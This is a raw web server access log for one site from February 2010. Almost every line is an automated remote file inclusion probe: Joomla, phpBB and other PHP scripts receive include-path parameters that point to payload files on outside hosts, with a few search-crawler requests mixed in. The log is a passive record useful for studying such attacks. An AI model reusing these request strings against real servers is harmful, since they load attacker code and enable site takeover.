89.163.145.165 - - [10/Feb/2010:06:41:32 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.blmra.co.uk/trust/modules/protector/configs/glup.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.163.145.165 - - [10/Feb/2010:06:41:33 -0800] "GET /logs/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.blmra.co.uk/trust/modules/protector/configs/glup.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:41:53 -0800] "GET /logs/access_100123.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:41:53 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:41:53 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:03 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:04 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:04 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:04 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:08 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:08 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:31 -0800] "GET /logs/access_100115.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [10/Feb/2010:06:43:34 -0800] "GET /logs/access_091011.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [10/Feb/2010:06:43:37 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_091011.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [10/Feb/2010:06:43:39 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://www.puaga.com/logs/access_091011.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:43:48 -0800] "GET /logs/access_100115.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:06:43:51 -0800] "GET /logs/access_100123.log//?path%5Bdocroot%5D=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
89.163.145.165 - - [10/Feb/2010:06:43:51 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.blmra.co.uk/trust/modules/protector/configs/glup.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:06:43:51 -0800] "GET /logs//?path%5Bdocroot%5D=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 200 4947 "-" "libwww-perl/5.834" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:06:43:52 -0800] "GET /?path%5Bdocroot%5D=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 200 3642 "-" "libwww-perl/5.834" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:44:08 -0800] "GET /logs/access_100112.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:44:08 -0800] "GET /logs//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:44:08 -0800] "GET /resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:06:44:23 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
74.50.6.170 - - [10/Feb/2010:06:44:24 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.gonapus.net//zero/data/add/test.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:44:29 -0800] "GET /logs/access_100103.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:44:40 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:44:47 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:44:56 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:15 -0800] "GET /logs/access_100114.log%20%20//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:15 -0800] "GET /logs/access_100111.log%20%20//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:15 -0800] "GET /logs//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:15 -0800] "GET /ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:24 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:24 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:29 -0800] "GET /logs/access_100123.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:29 -0800] "GET /logs//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:34 -0800] "GET /logs/access_100111.log%20%20//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:34 -0800] "GET /ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:34 -0800] "GET /logs/access_100114.log%20%20//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:45:37 -0800] "GET /logs/access_100112.log//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:45:37 -0800] "GET /resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:45:37 -0800] "GET /logs/access_100112.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:45:37 -0800] "GET /logs//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:45:52 -0800] "GET /logs/access_100115.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:45:59 -0800] "GET /logs/access_100103.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:45:59 -0800] "GET /logs/access_100103.log//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:46:28 -0800] "GET /logs/access_100112.log//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [10/Feb/2010:06:46:28 -0800] "GET /logs/access_100103.log//resource_categories_view.php?CLASSES_ROOT=http://www.kslr.or.kr/bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:46:32 -0800] "GET /logs/access_100115.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:06:46:37 -0800] "GET /logs/access_100129.log//?path%5Bdocroot%5D=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:46:45 -0800] "GET /logs/access_100115.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:46:54 -0800] "GET /logs/access_100115.log//newspublish/include.php?path%5Bdocroot%5D=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.82.114.113 - - [10/Feb/2010:06:48:21 -0800] "GET /modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
118.82.114.113 - - [10/Feb/2010:06:48:21 -0800] "GET /logs//modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.puaga.com"
118.82.114.113 - - [10/Feb/2010:06:48:21 -0800] "GET /modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
118.82.114.113 - - [10/Feb/2010:06:48:21 -0800] "GET /logs//modules/Forums/includes/functions_admin.php?phpbb_root_path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
67.225.178.114 - - [10/Feb/2010:06:48:37 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
67.225.178.114 - - [10/Feb/2010:06:48:37 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
67.225.178.114 - - [10/Feb/2010:06:48:38 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
67.225.178.114 - - [10/Feb/2010:06:48:38 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig.absolute.path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:50:19 -0800] "GET /logs/access_100103.log//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:50:20 -0800] "GET /logs/access_100112.log//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:50:52 -0800] "GET /logs//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:50:52 -0800] "GET /resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:50:53 -0800] "GET /logs/access_100112.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:51:01 -0800] "GET /logs/access_100103.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:51:09 -0800] "GET /logs//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:51:09 -0800] "GET /resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:51:10 -0800] "GET /logs/access_100112.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [10/Feb/2010:06:51:21 -0800] "GET /logs/access_100103.log%20%20//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:51:36 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:51:51 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:51:53 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:51:56 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:06:52:32 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:06:52:32 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:06:52:32 -0800] "GET /logs/access_100111.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:06:52:34 -0800] "GET /logs//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:06:52:34 -0800] "GET /logs/access_100111.log//write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [10/Feb/2010:06:52:34 -0800] "GET /write.php?board_skin_path=http://www.ansan1.org/church/i/data/receipt/1175206935/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:53:01 -0800] "GET /logs/access_100112.log//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [10/Feb/2010:06:53:01 -0800] "GET /logs/access_100103.log//resource_categories_view.php?CLASSES_ROOT=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:06:54:48 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:06:54:48 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:06:54:48 -0800] "GET /logs/access_100111.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:06:55:38 -0800] "GET /write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:06:55:38 -0800] "GET /logs/access_100111.log//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.172 - - [10/Feb/2010:06:55:38 -0800] "GET /logs//write.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.163.145.165 - - [10/Feb/2010:06:55:50 -0800] "GET /logs/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.blmra.co.uk/trust/modules/protector/configs/glup.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
89.163.145.165 - - [10/Feb/2010:06:55:51 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.blmra.co.uk/trust/modules/protector/configs/glup.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
209.59.163.57 - - [10/Feb/2010:06:56:20 -0800] "GET /logs/access_100129.log%20//?path%5Bdocroot%5D=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:56:21 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:56:36 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:56:43 -0800] "GET /logs/access_100201.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.52.110 - - [10/Feb/2010:06:56:53 -0800] "GET /logs/access_100107.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://qqe.ru/forum//attachments/id1.txt???%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.213.93.197 - - [10/Feb/2010:06:57:37 -0800] "GET /logs/access_100119.log%20%20//write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:58:23 -0800] "GET /logs/access_100111.log//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:58:35 -0800] "GET /logs/access_100114.log//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:58:55 -0800] "GET /logs/access_100111.log//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.165.1.69 - - [10/Feb/2010:06:59:00 -0800] "GET /logs/access_100114.log//ashnews.php?pathtoashnews=http://cyber.kma.go.kr//data/member/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [10/Feb/2010:07:01:09 -0800] "GET /logs/access_100117.log//delete_comment.php?board_skin_path=http://laternamedica.se/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [10/Feb/2010:07:01:09 -0800] "GET /delete_comment.php?board_skin_path=http://laternamedica.se/id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [10/Feb/2010:07:01:09 -0800] "GET /logs//delete_comment.php?board_skin_path=http://laternamedica.se/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [10/Feb/2010:07:01:22 -0800] "GET /logs/access_100125.log//delete_comment.php?board_skin_path=http://laternamedica.se/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:04:43 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:04:43 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:04:43 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:04:43 -0800] "GET /index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:05:06 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:05:06 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:05:06 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.100.177 - - [10/Feb/2010:07:05:07 -0800] "GET /index.php?DOCUMENT_ROOT=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [10/Feb/2010:07:05:10 -0800] "GET /logs/access_090813.log/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [10/Feb/2010:07:05:10 -0800] "GET /logs/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
